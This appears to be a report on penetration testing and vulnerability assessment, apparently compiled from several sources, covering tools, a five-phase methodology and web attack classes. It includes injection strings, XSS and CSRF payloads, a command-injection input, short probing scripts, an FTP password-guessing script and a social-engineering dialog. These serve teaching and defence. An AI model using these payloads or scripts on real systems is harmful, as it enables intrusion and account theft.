Acunetix Web Vulnerability Scanner crawls web sites, including sites hosting Flash content, analyzes web applications and SOAP-based web services, and finds SQL injection, cross-site scripting, and other vulnerabilities. Acunetix Web Vulnerability Scanner includes an automatic JavaScript analyzer that enables security analysis of AJAX and Web 2.0 applications, as well as Acunetix's AcuSensor Technology, which can pinpoint the following vulnerabilities among others: version checks; web server configuration checks; parameter manipulations; multi-request parameter manipulations; file checks; unrestricted file upload checks; directory checks; text searches; weak HTTP passwords; hacks from the Google Hacking Database; port scanner and network alerts; other web vulnerability checks; and other application vulnerability tests. The scanner is able to automatically fill in web forms and authenticate against web logins, enabling it to scan password-protected areas. Additional manual vulnerability tests, e.g. for buffer overflows and subdomain scanning, are supported by the scanner's built-in penetration testing tools. The penetration test tool suite includes an HTTP Editor for constructing HTTP/HTTPS requests and analyzing the web server's response; an HTTP Sniffer for intercepting, logging, and modifying HTTP/HTTPS traffic and revealing data sent by a web application; an HTTP Fuzzer for sophisticated fuzz testing of web applications' input validation and handling of unexpected and invalid random data; a scripting tool for scripting custom web attacks; and a Blind SQL Injector for automated database data extraction. Acunetix Web Vulnerability Scanner includes a reporting module that can generate compliance reports for PCI DSS and other regulations/standards. The scanner is offered in Small Business, Enterprise, and Consultant editions.
2.3 Merits and Demerits of Penetration Testing Tools
Comparison of penetration testing tools across merits, demerits, average scan time, performance, accuracy and reliability (the final metric was unlabeled in the original chart):

Tool             Merits   Demerits   Scan time   Performance   Accuracy   Reliability   (unlabeled)
Acunetix         63%      36%        6.2 min     66%           51%        59%           3%
Appscan          54%      16%        7.1 min     68%           67%        62%           9%
Burp Suite Pro   64%      53%        4.8 min     70%           62%        65%           2%
Hailstorm        61%      39%        3.6 min     67%           70%        72%           8.5
NMAP             92%      8%         1.18 min    81%           88%        93%           37.5%
Nessus           91%      9%         1.25 min    76%           82%        82%           19%
Metasploit       87%      11%        2.48 min    74.25%        79%        77%           21%
3.1 Penetration testing in current industry, 3.2 Vulnerability Assessment, 3.3 Roles and Responsibilities of Penetration testers, 3.4 Proposed Work

3.1 Penetration testing in current industry
With the emergence of the Internet, web applications have penetrated deeper and deeper into the enterprise. Initially used as a public interface towards customers and mostly serving marketing purposes, web applications have grown into complex, multilayer solutions that serve diverse purposes in modern organizations and enterprises. From a public marketing interface, web applications have been integrated into the internal network, serving a multitude of purposes: people management, accounting, support, document management, asset management, etc. Web applications have largely replaced traditional desktop applications in most modern organizations and businesses. Services that have traditionally been served by numerous other types of applications are now often delivered by web applications. The ease of development of web applications is the primary reason for their deep integration into modern networks. However, it is also the primary reason why so many web applications are prone to often serious security weaknesses and vulnerabilities. Currently web applications are the single most attacked service type on the Internet.
[Diagram: the five-phase testing cycle - Reconnaissance (information analysis), Discovery (cookies gathering), Identification (vulnerability databases, manual identification), Exploitation (manual exploitation) and Rating (vulnerability rating).]
The general Penetration Testing Methodology is based on a circular approach of 5 continuous phases, as described in the diagram above. During a typical engagement, the tester starts with the Reconnaissance phase, then moves forward until the Rating phase. The whole process is repeated several times if needed, in order to obtain results that are as accurate as possible. The Web Application Penetration Testing service is based on a methodology that builds on the OWASP web application testing methodology, but also on general penetration testing methodologies such as OISSG's ISSAF or SANS. Our vision is that although it is important to follow a general methodology, penetration testers should have the ability to change the methodology they are using and adapt it to each particular test. This vision reflects the way real attackers proceed: professional attackers will deviate from a methodology or process in order to achieve their goal. The following is a general description of the 5-phase approach that is followed throughout Web Application Penetration Testing engagements:

Reconnaissance - The Reconnaissance phase encompasses the actions taken by the security consultant to gain better knowledge about the target web application, as well as its design and functions. Different methods are employed to obtain as much information as possible about the target web application, including the use of external sources such as search engines, public forums, newsgroups, etc. The consultant will also attempt to precisely identify the target web server, application server, operating systems, development environments, back-end database, etc.

Discovery - The Discovery phase encompasses the active gathering of information from the target web application. Using a set of tools and utilities, the security consultant will attempt to map out the structure of the target web site. The result of this phase is typically a detailed scheme that describes the structure of the web application or site and provides the consultant with important information about weak points in the application. The consultant will use the information obtained throughout the phase to select target pages that are likely to contain security issues and vulnerabilities (i.e. dynamic pages).

Identification - During the Vulnerability Identification phase, the security consultant will attempt to identify security weaknesses, vulnerabilities or issues in the list of resources that were identified throughout the previous phases. The identification of security vulnerabilities and weaknesses in the target web application is performed using several methods, including the use of vulnerability assessment tools and utilities, the use of vulnerability databases and manual vulnerability identification.

Exploitation - The Vulnerability Exploitation phase is the most critical part of a Web Application Penetration Testing engagement. During this phase, the security consultant will attempt to exploit the vulnerabilities that were previously discovered by performing an actual attack against the services in question. Several methods of exploitation are used, including manual exploitation, the use of custom exploitation scripts and the use of publicly available security exploits.
Rating - The primary objective of the Vulnerability Rating phase is to objectively rate the security vulnerabilities and weaknesses that have been discovered throughout the previous testing phases and to prepare all information that will be needed for the penetration testing report. The tester will also save all log information such as attack tool output, attack screenshots and vulnerability assessment scan reports. If the optional logging of packet captures was ordered the captures will be stored for the retention period.
3.2 Vulnerability Assessment

Vulnerability: A flaw or weakness in system security procedures, design, implementation, or internal controls that could be exercised (accidentally triggered or intentionally exploited) and result in a security breach or a violation of the system's security policy.

Vulnerability assessments are a crucial component of network security and the risk management process. Internetworks and Transmission Control Protocol/Internet Protocol (TCP/IP) networks have grown exponentially over the last decade. Along with this growth, computer vulnerabilities and malicious exploitation have increased. Operating system updates, vulnerability patches, virus databases, and security bulletins have become a key resource for any savvy network administrator or network security team. It is the application of the patches and the use of knowledge gained from these resources that actually make the difference between a secure network system and a network used as a backdoor playground for malicious hacker attacks. Starting with a system baseline analysis, routine vulnerability assessments need to be performed and tailored to the needs of the company to maintain a network system at a relatively secure level. There are two types of vulnerability assessments: network-based and host-based. The assessment can be carried out either internally or outsourced to a third-party vendor such as Foundstone (www.foundstone.com) or Vigilante (www.vigilante.com). The initial vulnerability assessment should be performed internally, with collaboration between the Information Technology (IT) department and upper management, using the host-based approach. The scope of this paper covers methods and guidelines to perform a basic host-based vulnerability assessment, with a review of the risk management process, performing a system baseline assessment, and finally, a basic vulnerability assessment.
Once the credible threats are identified, a vulnerability assessment must be performed. The vulnerability assessment considers the potential impact of loss from a successful attack as well as the vulnerability of the facility/location to an attack. Impact of loss is the degree to which the mission of the agency is impaired by a successful attack from the given threat. A key component of the vulnerability assessment is properly defining the ratings for impact of loss and vulnerability. These definitions may vary greatly from facility to facility. For example, the amount of time that mission capability is impaired is an important part of impact of loss. If the facility being assessed is an Air Route Traffic Control Tower, a downtime of a few minutes may be a serious impact of loss, while for a Social Security office a downtime of a few minutes would be minor. A sample set of definitions for impact of loss is provided below. These definitions are for an organization that generates revenue by serving the public.
Devastating: The facility is damaged/contaminated beyond habitable use. Most items/assets are lost, destroyed, or damaged beyond repair/restoration. The number of visitors to other facilities in the organization may be reduced by up to 75% for a limited period of time.

Severe: The facility is partially damaged/contaminated. Examples include a partial structure breach resulting in weather/water, smoke, impact, or fire damage to some areas. Some items/assets in the facility are damaged beyond repair, but the facility remains mostly intact. The entire facility may be closed for a period of up to two weeks, and a portion of the facility may be closed for an extended period of time (more than one month). Some assets may need to be moved to remote locations to protect them from environmental damage. The number of visitors to the facility and others in the organization may be reduced by up to 50% for a limited period of time.

Noticeable: The facility is temporarily closed or unable to operate, but can continue without an interruption of more than one day. A limited number of assets may be damaged, but the majority of the facility is not affected. The number of visitors to the facility and others in the organization may be reduced by up to 25% for a limited period of time.

Minor: The facility experiences no significant impact on operations (downtime is less than four hours) and there is no loss of major assets.
Vulnerability is defined to be a combination of the attractiveness of a facility as a target and the level of deterrence and/or defense provided by the existing countermeasures. Target attractiveness is a measure of the asset or facility in the eyes of an aggressor and is influenced by the function and/or symbolic importance of the facility. Sample definitions for vulnerability ratings are as follows:
Very High: This is a high-profile facility that provides a very attractive target for potential adversaries, and the level of deterrence and/or defense provided by the existing countermeasures is inadequate.

High: This is a high-profile regional facility or a moderate-profile national facility that provides an attractive target and/or the level of deterrence and/or defense provided by the existing countermeasures is inadequate.

Moderate: This is a moderate-profile facility (not well known outside the local area or region) that provides a potential target and/or the level of deterrence and/or defense provided by the existing countermeasures is marginally adequate.

Low: This is not a high-profile facility; it provides a possible target and/or the level of deterrence and/or defense provided by the existing countermeasures is adequate.
The vulnerability assessment may also include detailed analysis of the potential impact of loss from an explosive, chemical, or biological attack. Professionals with specific training and experience in these areas are required to perform these detailed analyses.
A vulnerability assessment is the process of identifying, quantifying, and prioritizing (or ranking) the vulnerabilities in a system. Examples of systems for which vulnerability assessments are performed include, but are not limited to, information technology systems, energy supply systems, water supply systems, transportation systems, and communication systems. Such assessments may be conducted on behalf of a range of different organizations, from small businesses up to large regional infrastructures. Vulnerability from the perspective of disaster management means assessing the threats from potential hazards to the population and to infrastructure. It may be conducted in the political, social, economic or environmental fields. Vulnerability assessment has many things in common with risk assessment. Assessments are typically performed according to the following steps:

1. Cataloging assets and capabilities (resources) in a system.
2. Assigning quantifiable value (or at least rank order) and importance to those resources.
3. Identifying the vulnerabilities or potential threats to each resource.
4. Mitigating or eliminating the most serious vulnerabilities for the most valuable resources.

A vulnerability assessment is the process of running automated tools against defined IP addresses or IP ranges to identify known vulnerabilities in the environment. Vulnerabilities typically include unpatched or misconfigured systems. The tools may be commercially available versions, such as Nessus or SAINT, or open source free tools such as OpenVAS. The commercial versions typically include a subscription to maintain up-to-date vulnerability signatures, similar to antivirus software subscriptions. The commercially available tools provide a straightforward method of performing vulnerability scanning. Organizations may also choose to use open source versions of vulnerability scanning tools. The advantage of open source tools is that you are using the tools of the trade commonly used by hackers: most hackers are not going to pay $2,000 for a subscription to Nessus, but will opt for the free version of tools. However, by using a commercially licensed vulnerability scanner, the risk is low that malicious code is included in the tool. The purpose of a vulnerability scan is to identify known vulnerabilities so they can be remediated, typically through the application of vendor-supplied patches. Vulnerability scans are key to an organization's vulnerability management program. The scans are typically run at least quarterly; vulnerabilities are remediated by the IT department until the next scan is run and a new list of vulnerabilities is identified that needs to be addressed. A vulnerability assessment is an automated scan to determine basic flaws in a system. This can be either network or application vulnerability scanning, or a combination of both. The common factor here is that the scan is automated and generates a report of vulnerabilities or issues that may need to be addressed. In a network vulnerability scan, software looks at a set list of IP addresses to determine what services are listening across the network, and also what software (including versions of the software) is running. Limited tests are run against the listening services, including attempts to log in with default account credentials, or comparing the versions of software against known vulnerable versions. If a match is found, it is recommended that the listening port be closed off and/or the software be upgraded if possible. Application vulnerability scanning can take either or both of two approaches:
Static Code Analysis: If you own the codebase of your application, the best place to start is with secure coding practices. It is a good idea to have code review as part of your software development process. Static code analysis involves more work upfront but results in much more robust applications. Dynamic Code Analysis is the next step; it is done by taking a black-box approach to the app and probing it with tools, similar to scanners, that perform injections and try to crash or bypass controls in the application. This is an automated process, and there are some inexpensive or free tools from Cenzic, Whitehat and Veracode, among others, that can do this on a basic level and offer different versions of this type of scan.
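To make the static side concrete, the toy checker below (Python; the src directory name is a placeholder and the pattern is deliberately naive) flags SQL statements built by string interpolation or concatenation, one of the classic findings of real static analysis tools:

    import pathlib
    import re

    # Naive pattern: execute(...) fed by % interpolation or string concatenation
    RISKY = re.compile(r"execute\(.*(%s|%\(|\+)")

    for path in pathlib.Path("src").rglob("*.py"):  # placeholder source tree
        for lineno, line in enumerate(path.read_text().splitlines(), start=1):
            if RISKY.search(line):
                print(f"{path}:{lineno}: SQL possibly built from raw strings")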
Identifying Vulnerabilities
A vulnerability assessment uses a combination of various methodologies to identify vulnerabilities including:
1. Patch correlation - identifying the flaw by looking to see if the patch for the flaw is missing.
2. Version correlation - identifying the flaw by looking at the software version in question.
3. Configuration correlation - identifying the flaw based on system configurations.
4. Policy correlation - identifying the flaw based on policy, procedure, and specification analysis.
5. Inferred correlation - identifying the flaw based on the presence of software, services, other flaws, etc.
6. Response correlation - identifying the flaw based on the results of an exploit attempt.
7. Social correlation - identifying the flaw based on social situations.
Misconception #1 - A vulnerability assessment just finds vulnerabilities; it does not exploit them. The methodology used for the activity does not determine whether the activity is a vulnerability assessment or a penetration test. However, the methodology used for vulnerability identification may affect the correctness and completeness of identification, which will in turn affect the overall outcome of the assessment. Each of the methods is useful to varying degrees in different scenarios; no one method is clearly better than another in all cases. Regardless of how we enumerate the vulnerabilities, we now have them. Notice that in some cases, we actually exploited the vulnerabilities to directly or indirectly identify their presence. Performing the exploitation did not move us out of the realm of a vulnerability assessment (misconception #1). We could potentially run every single exploit for every vulnerability as our means of vulnerability identification, if we had exploits for every vulnerability that we wanted to identify. However, realizing that an attempt to exploit a vulnerability may cause disruption to computer networks, may not actually confirm the vulnerability, or, even worse, may cause the assessed system to crash, we often substitute such exploitation in favor of other methods such as patch validation. The results are most often more accurate and less disruptive than exploitive vulnerability identification.

Vulnerability Valuation

Vulnerabilities are ranked and classified based on a variety of factors, including:
1. Severity - the Confidentiality, Integrity and Availability impact of the flaw if it is exploited.
2. Exploitability - how easy it is to exploit the flaw.
3. Relevance - how new or old the flaw is.
4. Organizational risk - how valuable the resource bearing the vulnerability is to the company.

These factors allow us to properly assess our target and provide a valuation that makes sense given all of the defined factors. Finally, as part of the assessment, it is typically assumed that you provide mitigation strategies to improve the security of the resource. Strictly speaking, this is not part of the assessment process; it is generally assumed that when you are given an assessment, you will be provided information regarding improving your valuation, but that is an additional service to an assessment. Some vulnerability assessment vendors will provide very little information, some provide fully managed remediation, and many fall in between.
All of these are goals for a penetration test. The organization asserts that they have sufficiently protected themselves, to the degree that the assertions should prove to be true. PCI Data Security Standard requirement 11.3 requires that an organization that stores credit card holder data engage in a penetration test to validate that this information is secure. In essence, PCI requires that the organization assert that they are secure in this regard, and requires that the organization test this assertion. With this defined, I raise the following misconception regarding penetration testing as it relates to vulnerability assessments:

Misconception #2 - A penetration test is testing to see if vulnerabilities are actually present. In a penetration test, the "something" that we are testing is not the validity of the found vulnerabilities. If we wanted more accurate vulnerability identification, we would ensure that we used more accurate means to identify vulnerabilities; we would not use a penetration test to validate them. Once again, penetration testing assesses the organization's assertion that they are secure. Another misconception regarding penetration testing is:

Misconception #3 - Penetration tests only involve network hacking tools. A penetration test, as seen above, is simply a test that examines an assertion by the organization for a given goal. It may involve the use of social engineering tactics, physical security hacking tactics, Google hacking, and, of course, the use of network hacking tools.
As depicted above, an organization bearing security risk should engage in an ongoing vulnerability management program. Although not shown in the diagram, the program should consist of ongoing measurements that determine the risk level. The organization should only engage in a penetration test when they have done what they can to lower the risk to the desired level. At some point in time, the organization should assert that they are confident they have secured what is important, and only then should they engage in a penetration test.

Vulnerability Detection

After having gathered the relevant information about the targeted systems, the next step is to determine the vulnerabilities that exist in each system. Penetration testers should have a collection of exploits and vulnerabilities at their disposal for this purpose. The knowledge of the penetration tester is put to the test here: an analysis is done on the information obtained to determine any possible vulnerability that might exist. This is called manual vulnerability scanning, as the detection of vulnerabilities is done manually. An example is the exploit known as the "dot bug" that existed in MS Personal Web Server back in 1998. This was a bug in IIS 3.0 that allowed ASP source code to be downloaded by appending a . to the filename. Microsoft eventually fixed this bug, but at the time it did not fix the same hole in its Personal Web Server, and some Personal Web Server installations still have this vulnerability today. If a system running Windows 95 and MS Personal Web Server pops up in the information gathered earlier, this would probably be a vulnerability that exists in that particular system. There are also tools available that can automate vulnerability detection. One such tool is Nessus (http://www.nessus.org). Nessus is a security scanner that remotely audits a given network and determines whether vulnerabilities exist in it. It produces a list of the vulnerabilities that exist in a network, as well as the steps that should be taken to address them.
SQL injection
SQL injection can occur when unvalidated user input is used to construct an SQL query that is then executed by the web server. A very well known example is the query used for a user login. This query usually looks like "SELECT * FROM users WHERE username='entered username' AND password='entered password'". If an attacker enters the string x' OR '1'='1 in both the username and the password, then the query becomes "SELECT * FROM users WHERE username='x' OR '1'='1' AND password='x' OR '1'='1' ". Because '1' is always equal to '1', this query is true for all records in the database. There are two different types of SQL injection: blind SQL injection and "normal" SQL injection. The difference between these two types is that for "normal" SQL injection the server shows an error message when the SQL query's syntax is incorrect; for blind SQL injection this error message is not shown, and instead the attacker sees a generic error message or page. "Normal" SQL injection can be tested for by entering characters like quotes to create a query with an incorrect syntax, then searching the page for error messages about it. Blind SQL injection cannot be detected this way; instead the attacker has to enter SQL commands like sleep, or statements that are always true or false. For instance, trying both strings ' AND '1'='1 and ' AND '1'='2 will likely produce different results if the page is vulnerable to SQL injection.
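The effect is easy to reproduce offline. The sketch below (Python with the standard sqlite3 module; the users table and credentials are made up for illustration) shows the naive concatenated query matching every row, and the parameterized form that defeats the injection:

    import sqlite3

    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice', 'secret')")  # made-up account

    username = password = "x' OR '1'='1"  # the classic injection string

    # Vulnerable: user input is concatenated straight into the SQL text
    query = ("SELECT * FROM users WHERE username='%s' AND password='%s'"
             % (username, password))
    print(conn.execute(query).fetchall())  # returns every row: [('alice', 'secret')]

    # Safe: placeholders make the driver treat the input as data, not SQL
    rows = conn.execute(
        "SELECT * FROM users WHERE username=? AND password=?",
        (username, password)).fetchall()
    print(rows)                            # returns [] -- no such user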
XPath injection
XPath injection (also known as blind XPath injection) is similar to SQL injection. The difference between the two vulnerabilities is that SQL injection targets a SQL database, whereas XPath injection targets an XML file, as XPath is a query language for XML data. Just like SQL injection, the attack is based on sending malformed input to the web application. This way the attacker can discover how the XML data is structured or access data they are not authorized to see.
Just like SQL injection, there are two types of XPath injection: "normal" XPath injection and blind XPath injection. The difference is that with blind XPath injection the attacker has no knowledge of the structure of the XML document and the application does not provide useful error messages. Testing for XPath injection is also similar to testing for SQL injection. The first step is to insert a quote in an input field to see if it produces an error message. For blind XPath injection, data is injected to create a query that always evaluates to true or false.
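The always-true trick carries over directly to XPath; the following minimal sketch uses the third-party lxml library, with the XML document and login query invented for illustration.

from lxml import etree

doc = etree.fromstring(
    "<users>"
    "<user><username>alice</username><password>secret</password></user>"
    "</users>")

entered_username = "x' or '1'='1"
entered_password = "x' or '1'='1"

# Vulnerable: user input is pasted straight into the XPath expression.
query = "//user[username/text()='%s' and password/text()='%s']" % (
    entered_username, entered_password)
print(doc.xpath(query))   # matches the user node despite the wrong credentials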
XSS
Cross-site scripting, often abbreviated as XSS, occurs when an attacker can input HTML code (such as JavaScript) that is then executed for visitors of the site. An example would be a guest book that shows the text entered in the guest book on the website. If an attacker enters the string <script>alert('XSS');</script>, a pop-up with the text "XSS" is shown on that page of the guest book. This type of vulnerability can also be exploited in a more serious way: an attacker might use XSS to steal a user's cookie, which can then be used to impersonate the user on a website. There are three different types of XSS: stored XSS, reflected XSS, and DOM-based XSS. The differences between these types are that for stored XSS the attacker's code is stored on the web server, whereas for reflected XSS the attacker's code is added to a link to the web application (e.g. in a GET parameter) and the attacker has to trick a user into clicking on the link. Such a link would look like http://www.example.com/index.php?input=<script>alert('XSS');</script>. For DOM-based XSS the attacker's code is not injected into the web application; instead the attacker uses existing JavaScript code on the target page to write text (e.g. <script>alert('XSS');</script>) on the page. To test for this vulnerability, a penetration testing tool should try to input HTML code into the inputs of a web application.
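A tester can automate this check by submitting a marker payload to each input and looking for it unescaped in the response; a minimal sketch, with the URL and parameter name hypothetical.

import requests

url = "http://www.example.com/guestbook"     # hypothetical page under test
payload = "<script>alert('XSS');</script>"

resp = requests.get(url, params={"input": payload}, timeout=10)

# If the payload comes back verbatim rather than HTML-encoded (&lt;script&gt;...),
# the parameter likely reflects attacker-controlled markup.
if payload in resp.text:
    print("Parameter 'input' reflects unescaped HTML -> possible XSS")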
CSRF
Cross-Site Request Forgery, often abbreviated as CSRF, is an attack in which an attacker tricks a user's browser into loading a request that performs an action on a web application the user is currently authenticated to. For example, an attacker might post the following HTML on a website or send it in an HTML email: <img src="http://www.bank.com/transfer_money?amount=10000&target_account=12345">. If the user is authenticated at his bank's website (at http://www.bank.com) when this link is loaded, it would transfer 10000 from the user's account to bank account number 12345. Testing for this attack is similar to testing for XSS: the tool has to check whether it can inject a link that may have an effect on another web application (e.g. the link in the example) into the web application being tested.
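One complementary check is to replay a state-changing request without any CSRF token and see whether the application still accepts it; the sketch below assumes a hypothetical endpoint and session cookie.

import requests

session_cookie = {"session": "authenticated-session-id"}   # hypothetical live session
url = "http://www.example.com/transfer_money"               # hypothetical endpoint
data = {"amount": "1", "target_account": "12345"}           # note: no CSRF token sent

resp = requests.post(url, data=data, cookies=session_cookie)

# If the action succeeds although the request carries no anti-CSRF token,
# the endpoint can be triggered from a page the attacker controls.
if resp.ok and "error" not in resp.text.lower():
    print("State-changing request accepted without a token -> possible CSRF")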
Command injection
Command injection means that the attacker can execute a command on the server. An example would be a web application that lets the user enter an IP address that the server will then ping. If an attacker enters the string 1.2.3.4;ls, the server sends a ping to the IP address 1.2.3.4 and then runs the command "ls". A penetration testing tool can test for this vulnerability by entering a semicolon followed by a command (e.g. "ls") into an input field that may be vulnerable and checking whether the response of the web application contains the output of the injected command.
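This check is easy to script: inject a command whose output is unmistakable and search the response for it. The sketch below uses a hypothetical URL and parameter, and injects "id" because its "uid=" output is easy to recognize.

import requests

url = "http://www.example.com/ping"   # hypothetical page that pings a user-supplied IP
payload = "1.2.3.4;id"                # the "uid=" output of id is easy to spot

resp = requests.get(url, params={"ip": payload}, timeout=20)

# If the response carries the injected command's output, the field is vulnerable.
if "uid=" in resp.text:
    print("Response contains 'id' output -> command injection likely")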
SSI injection
Server-Side Includes injection, often abbreviated to SSI injection, is an attack in which the attacker can enter SSI directives (e.g. <!--#include file="file.txt" --> or <!--#exec cmd="ls -l" -->) that are then executed by the web server. To test for SSI injection, a penetration testing tool has to enter SSI directives into the inputs of a web application and check whether the web server executes them by searching the web page for the results of the SSI directive.
Buffer overflow
In short, a buffer overflow occurs when an application tries to store more data in a buffer than the buffer can hold. Testing for buffer overflows is relatively easy: the tool has to input long (random) data and check whether this produces any errors caused by trying to store more data than fits in the buffer.
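A simple way to apply this is to send inputs of increasing length and watch for server errors or dropped connections; a sketch against a hypothetical input field.

import requests

url = "http://www.example.com/search"    # hypothetical input to fuzz

for length in (64, 256, 1024, 4096, 16384):
    try:
        resp = requests.get(url, params={"q": "A" * length}, timeout=10)
        if resp.status_code >= 500:
            print("Server error at input length %d -> possible overflow" % length)
    except requests.exceptions.RequestException:
        print("Connection failed at length %d -> the service may have crashed" % length)
        break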
Penetration Attempt
After determining the vulnerabilities that exist in the systems, the next stage is to identify suitable targets for a penetration attempt. The time and effort that need to be put into the systems that have vulnerabilities must be estimated accordingly, so estimates of how long a penetration test takes on a particular system are important at this point. The choice of target for the penetration attempt is also important. Imagine a scenario in which two penetration testers are required to perform a penetration test on a network of more than 200 machines. After gathering sufficient information and vulnerabilities about the network, they find that there are only 5 servers on the network and the rest are just normal PCs used by the organization's staff. Common sense tells them that the likely targets are these 5 servers. One practice of most organizations is to name their machines in a way that conveys what each machine does, and the computer name of the target is sometimes a decisive factor for choosing targets. Often, after a network survey, you will find computer names like SourceCode_PC, Int_Surfing and others that give penetration testers an idea of what the machine does. By choosing their targets properly, penetration testers will not waste time and effort doing redundant work. Penetration tests normally have a time constraint, and penetration testers should not waste any time unnecessarily. There are other ways to choose a target; the above just demonstrates some of the criteria used. After choosing the suitable targets, the penetration attempt is performed on them. There are some tools available for free via the Internet, but they generally require customization. Knowing that a vulnerability exists on a target does not always imply that it can be exploited easily; therefore, it is not always possible to penetrate successfully even though it is theoretically possible. In any case, existing exploits should be tested on the target first before conducting any other penetration attempt. Password cracking has become a normal practice in penetration tests. In most cases, you will find services such as telnet and FTP running on systems. This is a good place to start using password cracking methods to penetrate these systems. The list below shows some of the password cracking methods used:
- Dictionary Attack: uses a word list or dictionary file.
- Hybrid Crack: tests for passwords that are variations of the words in a dictionary file.
- Brute Force: tests for passwords made up of characters by going through all possible combinations.
There is a very good tool, called Brutus, that can be used to automate telnet and FTP account cracking. The penetration attempts do not end here. There are two more suitable methods to attempt a penetration: social engineering and testing the organization's physical security. Social engineering is an art used by hackers that capitalizes on the weakness of the human element of the organization's defense. The dialog below shows an example of how an attacker can exploit the weakness of an employee in a large organization.
Attacker: Hi Ms Lee, this is Steven from the IS Department. I've found a virus stuck in your mailbox and would like to help you remove it. Can I have the password to your email?
Ms Lee (the secretary): A virus? That's terrible. My password is magnum. Please help me clean it up.
There is no harm in deploying social engineering and using it numerous times to obtain critical information from the organization's employees. This is, of course, bound to the agreement that the organization allows such methods to be used during the penetration tests. Physical security testing involves penetration testers trying to gain access to the organization's facility by defeating its physical security; social engineering can be used to get past the organization's physical security as well. The main focus of this paper is penetration testing, but there is often some confusion between penetration testing and vulnerability assessment. The two terms are related, but penetration testing places more emphasis on gaining as much access as possible, while vulnerability assessment places the emphasis on identifying the areas that are vulnerable to a computer attack. An automated vulnerability scanner will often identify possible vulnerabilities based on service banners or other network responses that are not in fact what they seem. A vulnerability assessor will stop just before compromising a system, whereas a penetration tester will go as far as they can within the scope of the contract. It is important to keep in mind that you are dealing with a test. A penetration test is like any other test in the sense that it is a sampling of all possible systems and configurations. Unless the contractor is hired to test only a single system, they will be unable to identify and penetrate all possible systems using all possible vulnerabilities. As such, any penetration test is a sampling of the environment. Furthermore, most testers will go after the easiest targets first.
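As an illustration of the dictionary attack described above, the sketch below tries a small word list against an FTP account using Python's ftplib; the host, username, and word list are hypothetical (a real test would read a large dictionary file).

import ftplib

host = "192.0.2.20"       # hypothetical FTP server found during scanning
user = "admin"            # hypothetical account to test
wordlist = ["password", "letmein", "magnum", "admin123"]   # normally read from a file

for candidate in wordlist:
    try:
        ftp = ftplib.FTP(host, timeout=10)
        ftp.login(user, candidate)    # raises error_perm on a wrong password
        print("Valid credentials: %s / %s" % (user, candidate))
        ftp.quit()
        break
    except ftplib.error_perm:
        continue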
VULNERABILITY IDENTIFICATION
The analysis of the threat to an IT system must include an analysis of the vulnerabilities associated with the system environment. The goal of this step is to develop a list of system vulnerabilities (flaws or weaknesses) that could be exploited by the potential threat-sources.
A vulnerability is a flaw or weakness in system security procedures, design, implementation, or internal controls that could be exercised (accidentally triggered or intentionally exploited) and result in a security breach or a violation of the system's security policy. The following sample pairings illustrate vulnerabilities together with their threat-sources and threat actions:
Vulnerability: Terminated employees' system identifiers (IDs) are not removed from the system. Threat-Source: Terminated employees. Threat Action: Dialing into the company's network and accessing company proprietary data.
Vulnerability: The company firewall allows inbound telnet, and the guest ID is enabled on the XYZ server. Threat-Source: Unauthorized users (e.g., hackers, terminated employees, computer criminals, terrorists). Threat Action: Using telnet to the XYZ server and browsing system files with the guest ID.
Vulnerability: The vendor has identified flaws in the security design of the system, but new patches have not been applied to the system. Threat-Source: Unauthorized users (e.g., hackers, disgruntled employees, computer criminals, terrorists). Threat Action: Obtaining unauthorized access to sensitive system files based on known system vulnerabilities.
Vulnerability: The data center uses water sprinklers to suppress fire, and tarpaulins to protect hardware and equipment from water damage are not in place. Threat-Source: Fire, negligent persons. Threat Action: Water sprinklers being turned on in the data center.
Recommended methods for identifying system vulnerabilities are the use of vulnerability sources, the performance of system security testing, and the development of a security requirements checklist. Note that the types of vulnerabilities that will exist, and the methodology needed to determine whether they are present, usually vary depending on the nature of the IT system and the phase of the SDLC it is in:
- If the IT system has not yet been designed, the search for vulnerabilities should focus on the organization's security policies, planned security procedures, system requirement definitions, and the vendors' or developers' security product analyses (e.g., white papers).
- If the IT system is being implemented, the identification of vulnerabilities should be expanded to include more specific information, such as the planned security features described in the security design documentation and the results of system certification test and evaluation.
- If the IT system is operational, the process of identifying vulnerabilities should include an analysis of the IT system security features and the security controls, technical and procedural, used to protect the system.
While addressing the fundamental security flaws in some applications often requires a re-architecture, there are several secondary measures infosec teams can implement to safeguard flawed applications. This tip covers a few of the steps that information security professionals can take to lock down their Web apps.
Using VPNs
For starters, as a best practice, certain functionality should only be accessible via a VPN. All admin functionality, for instance, should be remapped onto internal IPs, which can then only be accessed by certain IPs over a VPN. Example functions include content management systems (CMS), server status scripts (server-status), and info scripts or SQL admin programs. Recently, HBGary Federal was attacked partly because the company allowed its CMS to be exposed to public IPs accessible from the Internet. It is also prudent to restrict Web services access only to internal IPs, unless you intend to give other companies access to them, in which case, those companies should also be provided with credentials for service access.
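One way to back up the firewall rules at the application layer is to reject admin paths from addresses outside the VPN range; a minimal Flask sketch, with the subnet and paths hypothetical.

from flask import Flask, abort, request
import ipaddress

app = Flask(__name__)
VPN_SUBNET = ipaddress.ip_network("10.8.0.0/24")   # hypothetical internal VPN range

@app.before_request
def restrict_admin_paths():
    # Admin functionality (CMS, server-status, SQL admin) is refused unless the
    # client address falls inside the VPN subnet.
    if request.path.startswith("/admin"):
        if ipaddress.ip_address(request.remote_addr) not in VPN_SUBNET:
            abort(403)

@app.route("/admin/cms")
def cms():
    return "content management system"

if __name__ == "__main__":
    app.run()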
Giving unnecessary rights to users is another area of concern, whether they are rights to a SQL Server database or to the service account that the application or Web server runs as. Excessive rights allow SQL tables to be dropped, commands to be run on the SQL server, or the Web server to run a wide range of programs, some of which might have privilege escalation vulnerabilities. While performing a recent pen test, I obtained a shell within an application server. Even though I was unable to escalate my privileges, the account had the ability to download and compile programs like port scanners, which allowed me to demonstrate that the machine could be used to stage further attacks into the network. Thus, making sure that users -- and programs that run as users -- have the minimum rights necessary to do their jobs, and no more, is of utmost importance.
